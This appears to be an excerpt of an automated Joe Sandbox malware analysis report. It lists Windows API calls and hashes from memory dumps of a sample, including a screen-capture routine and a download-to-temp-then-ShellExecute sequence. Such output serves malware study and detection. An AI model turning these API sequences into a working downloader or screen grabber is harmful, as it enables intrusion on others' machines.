• GetDC.USER32(?), ref: 0040216D
• CreateSolidBrush.GDI32(00646464), ref: 00402180
• SelectObject.GDI32(00000000,00000000), ref: 00402194
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
• SelectObject.GDI32(00000000,00000000), ref: 004021AD
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
• MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
• SelectObject.GDI32(00000000,00000000), ref: 00402206
• SetBkMode.GDI32(?,00000001), ref: 00402283
• SetTextColor.GDI32(?,00000000), ref: 00402292
• _wcslen.LIBCMT ref: 0040229B
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
• String ID: Tahoma
• API String ID: 3832963559-3580928618
APIs
• DestroyWindow.USER32(?), ref: 004025ED
• DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
• ReleaseCapture.USER32 ref: 00402612
• GetDC.USER32(00000000), ref: 00402639
• CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
• CreateCompatibleDC.GDI32(?), ref: 004026C9
• SelectObject.GDI32(00000000,00000000), ref: 004026D3
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
• ShowWindow.USER32(?,00000000), ref: 0040270A
• GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
• GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
• DeleteFileW.KERNEL32(?), ref: 00402751
• DeleteDC.GDI32(00000000), ref: 00402758
• DeleteObject.GDI32(00000000), ref: 0040275F
• ReleaseDC.USER32(00000000,?), ref: 0040276D
• DestroyWindow.USER32(?), ref: 00402774
• SetCapture.USER32(?), ref: 004027C1
• GetDC.USER32(00000000), ref: 004027F5
• ReleaseDC.USER32(00000000,00000000), ref: 0040280B
• GetKeyState.USER32(0000001B), ref: 00402818
• DestroyWindow.USER32(?), ref: 0040282D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
• String ID: gya
• API String ID: 2545303185-1989253062
APIs
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A00C56
                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00A00CBD
                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00A00CDA
                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00A00D40
                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00A00D55
                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00A00D67
                                                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00A00D95
                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00A00DA0
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A00DCC
                                                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00A00DDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                    • String ID: 11@$%D
                                                                                    • API String ID: 3720063390-4114847594
                                                                                    • Opcode ID: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                                                    • Instruction ID: d8282d752e395fb162e1950f7addd0d990faff6ffbb912007caf0e08eb841030
                                                                                    • Opcode Fuzzy Hash: 6daf059359ebdef5a4ede7147139a3b2708b04212e06e16dc02b70a899e44c79
                                                                                    • Instruction Fuzzy Hash: F741C230A0024C9BDF05FFA4E565BFD7765AF81304F1440A9E9456B2C3CB75AE45C7A2
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                                                      • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                                                    • _free.LIBCMT ref: 0043A651
                                                                                      • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                      • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                    • _free.LIBCMT ref: 0043A673
                                                                                    • _free.LIBCMT ref: 0043A688
                                                                                    • _free.LIBCMT ref: 0043A693
                                                                                    • _free.LIBCMT ref: 0043A6B5
                                                                                    • _free.LIBCMT ref: 0043A6C8
                                                                                    • _free.LIBCMT ref: 0043A6D6
                                                                                    • _free.LIBCMT ref: 0043A6E1
                                                                                    • _free.LIBCMT ref: 0043A719
                                                                                    • _free.LIBCMT ref: 0043A720
                                                                                    • _free.LIBCMT ref: 0043A73D
                                                                                    • _free.LIBCMT ref: 0043A755
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 00A1A8C3
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C2F
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C41
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C53
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C65
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C77
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C89
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19C9B
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CAD
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CBF
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CD1
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CE3
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19CF5
                                                                                      • Part of subcall function 00A19C12: _free.LIBCMT ref: 00A19D07
                                                                                    • _free.LIBCMT ref: 00A1A8B8
                                                                                      • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
                                                                                      • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
                                                                                    • _free.LIBCMT ref: 00A1A8DA
                                                                                    • _free.LIBCMT ref: 00A1A8EF
                                                                                    • _free.LIBCMT ref: 00A1A8FA
                                                                                    • _free.LIBCMT ref: 00A1A91C
                                                                                    • _free.LIBCMT ref: 00A1A92F
                                                                                    • _free.LIBCMT ref: 00A1A93D
                                                                                    • _free.LIBCMT ref: 00A1A948
                                                                                    • _free.LIBCMT ref: 00A1A980
                                                                                    • _free.LIBCMT ref: 00A1A987
                                                                                    • _free.LIBCMT ref: 00A1A9A4
                                                                                    • _free.LIBCMT ref: 00A1A9BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction ID: 20af751507773bd7004eee0eecf64f6e27a02ab812ca86744d9a9c4d225b312c
                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                    • Instruction Fuzzy Hash: 0A318B72601305EFDF20AB38D942BDAB3E8AF11390F11482AF468CB251DE71ADD08A16
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                    • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                    • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 009E2C9E
                                                                                    • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 009E2CB4
                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 009E2CD0
                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 009E2CE6
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 009E2D1F
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 009E2D5B
                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009E2D78
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 009E2DEF
                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 009E2E04
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                    • String ID: <
                                                                                    • API String ID: 838076374-4251816714
                                                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                    • Instruction ID: 5120e125bbfffde8c29b1b0276af1cf95e76deefd5f588d1a878856eeb0b033a
                                                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                    • Instruction Fuzzy Hash: 7641507190026CAEEB219F61DC85FEAB7BCFF09745F0081F9A549A2150DE709E858FA4
                                                                                    APIs
                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                                                      • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                    • String ID: 11@$pContext$switchState
                                                                                    • API String ID: 3151764488-3851367110
                                                                                    • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                    • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                                                    • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                                                    • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,009FF248,00000004,009F7DA7,00000004,009F8089), ref: 009FEF19
                                                                                    • GetLastError.KERNEL32(?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000,?), ref: 009FEF25
                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000), ref: 009FEF35
                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 009FEF4B
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF61
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF78
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF8F
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFA6
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                    • String ID: advapi32.dll
                                                                                    • API String ID: 2340687224-4050573280
                                                                                    • Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                                                    • Instruction ID: edb5e664a0d414903aee43efd090939b8951afd2ad817f03e992e8255dff809b
                                                                                    • Opcode Fuzzy Hash: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                                                    • Instruction Fuzzy Hash: 772190B1904714BFD7106FB49C09B6ABFACEF05B16F104A2AF651D3651CB7CC5408BA9
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,009FF248,00000004,009F7DA7,00000004,009F8089), ref: 009FEF19
                                                                                    • GetLastError.KERNEL32(?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000,?), ref: 009FEF25
                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,009FF248,00000004,009F7DA7,00000004,009F8089,?,009F87B9,?,00000008,009F802D,00000000,?,?,00000000), ref: 009FEF35
                                                                                    • GetProcAddress.KERNEL32(00000000,00447430), ref: 009FEF4B
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF61
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF78
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEF8F
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFA6
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FEFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                    • String ID: advapi32.dll
                                                                                    • API String ID: 2340687224-4050573280
                                                                                    • Opcode ID: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                                                    • Instruction ID: 8df436c9da974996bb95b471d5af40cdd2dcb47cd52c9b1797cd2974c2faf5b4
                                                                                    • Opcode Fuzzy Hash: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                                                    • Instruction Fuzzy Hash: 0F21B0B1904704BBD7106FB49C09B6ABFECEF05B12F004A2AF651D3651CB7CD4408BA9
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,009F672B), ref: 009F24D6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009F24E4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009F24F2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,009F672B), ref: 009F2520
• GetProcAddress.KERNEL32(00000000), ref: 009F2527
• GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F2542
• GetLastError.KERNEL32(?,?,?,009F672B), ref: 009F254E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F2564
• __CxxThrowException@8.LIBVCRUNTIME ref: 009F2572
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: DecodePointer
• String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-2461957735
APIs
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
• GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
• DuplicateHandle.KERNEL32(00000000), ref: 00419799
• SafeRWList.LIBCONCRT ref: 004197B8
  • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
  • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
• GetLastError.KERNEL32 ref: 004197D9
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
• __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
• String ID: eventObject
• API String ID: 1999291547-1680012138
APIs
• Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415269
  • Part of subcall function 00414C7A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C8E
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415292
  • Part of subcall function 004130F4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413110
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152B9
• Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415173
  • Part of subcall function 00413158: __EH_prolog3_GS.LIBCMT ref: 0041315F
  • Part of subcall function 00413158: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041316E
  • Part of subcall function 00413158: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413175
  • Part of subcall function 00413158: GetCurrentThread.KERNEL32 ref: 0041319D
  • Part of subcall function 00413158: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004131A7
• Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415194
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151CB
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041520E
• Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00415301
• Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415325
• Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415332
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
• String ID:
• API String ID: 64082781-0
APIs
• Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 009F54D0
  • Part of subcall function 009F4EE1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 009F4EF5
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009F54F9
  • Part of subcall function 009F335B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009F3377
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 009F5520
• Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 009F53DA
  • Part of subcall function 009F33BF: __EH_prolog3_GS.LIBCMT ref: 009F33C6
  • Part of subcall function 009F33BF: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 009F33D5
  • Part of subcall function 009F33BF: GetProcessAffinityMask.KERNEL32(00000000), ref: 009F33DC
  • Part of subcall function 009F33BF: GetCurrentThread.KERNEL32 ref: 009F3404
  • Part of subcall function 009F33BF: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 009F340E
• Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 009F53FB
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009F5432
• Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 009F5475
• Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 009F5568
• Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 009F558C
• Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 009F5599
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Similarity
• API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
• String ID:
• API String ID: 64082781-0
APIs
• _free.LIBCMT ref: 00431E1A
  • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
  • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
• _free.LIBCMT ref: 00431E26
• _free.LIBCMT ref: 00431E31
• _free.LIBCMT ref: 00431E3C
• _free.LIBCMT ref: 00431E47
• _free.LIBCMT ref: 00431E52
• _free.LIBCMT ref: 00431E5D
• _free.LIBCMT ref: 00431E68
• _free.LIBCMT ref: 00431E73
• _free.LIBCMT ref: 00431E81
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00A12081
  • Part of subcall function 00A136F1: HeapFree.KERNEL32(00000000,00000000,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?), ref: 00A13707
  • Part of subcall function 00A136F1: GetLastError.KERNEL32(?,?,00A1A37F,?,00000000,?,00000000,?,00A1A623,?,00000007,?,?,00A1AA17,?,?), ref: 00A13719
• _free.LIBCMT ref: 00A1208D
• _free.LIBCMT ref: 00A12098
• _free.LIBCMT ref: 00A120A3
• _free.LIBCMT ref: 00A120AE
• _free.LIBCMT ref: 00A120B9
• _free.LIBCMT ref: 00A120C4
• _free.LIBCMT ref: 00A120CF
• _free.LIBCMT ref: 00A120DA
